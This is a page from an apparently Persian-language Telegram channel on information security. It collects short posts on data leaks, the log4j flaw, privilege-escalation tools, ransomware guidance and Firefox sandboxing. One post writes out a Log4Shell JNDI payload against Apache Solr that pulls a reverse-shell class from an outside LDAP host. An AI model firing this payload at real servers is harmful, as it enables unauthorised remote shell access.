امنیت اطلاعات
849 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
باب دیاچنکو که پیش از این دیتابیس سامانه ی شکار را رسانه ای کرده بود از کشف دیتابیسی از وبسایت StripChat خبر داد.
وبسایت مذکور که قبرسی است دسترسی پخش زنده به مدل های عریان ارائه میدهد.
این دیتابیس الستیک حاوی ۶۵ میلیون رکورد از کاربران این سایت به همراه آدرس ایمیل و آی پی و میزان پولی ست که به هر مدل پرداخت کرده اند، می باشد.
همچنین اطلاعات ۴۲۱ هزار مدل از جمله نام و جنسیت و قیمت و ... نیز در دیتابیس دیگری در دسترس بوده است.

https://threatpost.com/adult-cam-model-user-records-exposed-stripchat-breach/176372/


#leak
#news

@sec_nerd
بالابردن سطح دسترسی در ویندوز با MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato


#windows
#privesc


@sec_nerd
رایت آپ account takeover با استفاده از تنظیمات نادرست oAuth و ترکیب آن با CSRF و XSS و بهره برداری از CSP ضعیف
https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html


#writeup
#web
#bugbounty


@sec_nerd
نگاهی عمیق به ایمپلنت روتر مورد استفاده هکرهای APT31


https://imp0rtp3.wordpress.com/2021/11/25/sowat/


#apt31
#malware


@sec_nerd
دستورات مفید برای خواندن Log


#cmd


@sec_nerd
👍1
نرم افزار پرداخت موبایلی Line Pay به اشتباه اطلاعات پرداختهای ۱۳۳ هزار کاربر را در گیت هاب منتشر کرد!

از این تعداد ۵۱ هزار کاربر ژاپنی و ۸۲ هزار تایوانی بوده اند و ۱۱ بار در طی ۱۰ هفته بازدید داشته است.

https://www.theregister.com/2021/12/07/line_pay_leaks_around_133000/


#leak
#line


@sec_nerd
نسخه ی ۹۵ مرورگر فایرفاکس به سندباکس جدید با نام RLBox مجهز شد.

این سندباکس قابلیت ایزوله کردن ماژولها و کامپوننت های مرورگر برای جلوگیری از آسیب زدن و سوء استفاده از آنها توسط دیگر اجزاء مرورگر را دارد.

https://thehackernews.com/2021/12/latest-firefox-95-includes-rlbox.html


#firefox


@sec_nerd
مرکز امنیت سایبری کانادا داکیومنت جالبی از نحوه ی رخ دادن حملات باج افزاری منتشر کرده


https://cyber.gc.ca/en/guidance/ransomware-playbook-itsm00099


#ransomware


@sec_nerd
apache solr EXP log4j

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json


#log4j


@sec_nerd
اگر تاحالا در مورد log4j و اکسپلویتش نخوندید این مطلب خوبیه

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/


#log4j


@sec_nerd
افزونه ی burpsuite برای آسیب پذیری log4j

https://github.com/silentsignal/burp-log4shell


#log4j
#burpsuite

@sec_nerd
بدست آوردن نسخه ی جاوا برای تشخیص آسیب پذیر بودن در برابر حمله ی log4shell
با استفاده از برپ

لیست هدرها
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt

#log4j

@sec_nerd